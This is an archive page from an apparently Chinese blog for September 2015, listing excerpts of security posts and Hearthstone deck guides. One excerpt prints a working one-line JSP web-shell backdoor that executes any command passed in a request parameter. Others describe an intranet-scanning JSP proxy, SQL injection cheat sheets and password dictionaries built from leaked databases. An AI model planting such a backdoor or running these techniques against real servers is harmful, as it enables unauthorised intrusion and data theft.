Menu

Monthly Archives: September 2015

大字典快速去重复python版
字典对于一个安全从业者的意义非常重要,尤其是渗透测试工程师,一份好的字典往往能带来意外的收获。 在当前各种裤子满天飞的环境下,快速整理有用信息并加入自己的字典已成为安全从业者的一个必备技能。 在处理大量单一字典变量的时候,我们往往会发现大量的重复,无论是什么原因造成的,对于一个强迫症来说,这是不能忍受的。 [...]
Apache规则ProxyPass与ProxyPassReverse及ProxyPassMatch的概述
这几个都是APACHE的代理指令: 1、ProxyPass: 语法:ProxyPass [path] !|url 它主要是用作URL前缀匹配,不能有正则表达式,它里面配置的Path实际上是一个虚拟的路径,在反向代理到后端的url后,path是不会带过去的,使用示例: 1)、ProxyPass /images/ [...]
php执行linux命令的6个函数
一般情况下,很少会用php去执行linux命令,不过特殊情况下,你也许会用到这些函数。以前我知道有二个函数可以执行linux命令,一个是exec,一个是shell_exec。其实有很多的,结合手册内容,介绍以下6个函数。 1,exec函数 查看复制打印? <?php $test = “ls [...]
炉石传说
前面说了这么多炉石的卡牌还没说我炉石传说的ID 本人ID:守望者#5638 喜欢炉石传说的小伙伴可以加一下好友一起玩 我比较喜欢法师(麦迪文)
Nginx安装部署
前言 Nginx是一款高性能的轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3/SMTP)代理服务器,并在一个BSD-like 协议下发行。由俄罗斯的程序设计师Igor [...]
利用iptables来配置linux禁止所有端口登陆和开放指定端口
1、关闭所有的 INPUT FORWARD OUTPUT 只对某些端口开放。 下面是命令实现: iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT DROP 再用命令 iptables -L -n 查看 是否设置好, 好看到全部 [...]
龙牧加强版 吊打土豪战
前言 组着玩的,居然一晚上连胜,废话不说先贴卡组。 卡组详情 套牌特色 这套卡组最大特点,不虚一切后期卡组打豪战9成胜率,不卡手可以吊打T7猎及其他快攻卡组,唯一只虚中速猎爹。 整体卡组思路,前期用随从质量站场,后期用卡牌强度致胜。 2张神圣新星,一张圣光炸弹,一张冰吼保证了清场能力。 [...]
改良机械法
前言 如题,套用美版登顶那一套卡组,考虑到不稳定因素去除了布林顿,替换为飞天魔像,然后冲上了传说。 感觉飞天魔像就是猎人的狮子,攻高难去除,大部分掉的怪都能接受,掉深渊领主56等都是赚。起手找跃迁和王师傅。下面给大伙儿分享一些卡组与对战经验。 卡组详情 套牌介绍 [...]
Rsync安全配置
0x00 Rsync简介 Rsync,remote synchronize顾名思意就知道它是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。 rsync是用 “rsync [...]
新版本巨人冰法卡组分享
TGT版本已经实装了一段时间,各种新思路卡组不断涌现,但更多的是在原有思路上的调整。今天给大家带来的是一套巨人冰法,是我在原有巨人冰思路上、在TGT的环境下改良的版本。 巨人冰法是一种非典型的冰法,从本质上来说,这套牌和传统冰法有着本质上的不同,即不是凭借OTK获取胜利,而是利用某些资源优势绝地翻盘的卡组 [...]
火焰不停魔法不止 新版火妖法卡组
今天我为大家带来的是TGT火妖法,加入了新卡的火妖法在清场能力上得到了更进一步的加强,更有罗宁大哥给的三张奥术飞弹,可以说是火妖下场对手再无场面。 废话不多说卡组奉上 卡组如下: 战术思路: [...]
jsp内网探测脚本&简单代理访问
废话不多说,直接上图: 1.直接访问默认扫描当前IP的C段,获取标题、web容器. 2.可以自定义传入需要扫描的段,传入参数ip即可 3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样 <%@ page language="java" [...]
SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 [...]
SQL注入速查表(上)
  0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。 [...]
Jsp一句话木马后门
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls [...]
习近平在纪念中国人民抗日战争暨世界反法西斯战争胜利70周年大会上的讲话
在纪念中国人民抗日战争暨世界反法西斯战争胜利70周年大会上的讲话 (2015年9月3日) 习近平  全国同胞们, 尊敬的各位国家元首、政府首脑和联合国等国际组织代表, 尊敬的各位来宾, 全体受阅将士们, 女士们、先生们,同志们、朋友们: [...]
Nginx解析漏洞的利用和修复方法
Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows等操作系统上,其特点是占用内存少,并发能力强。 [...]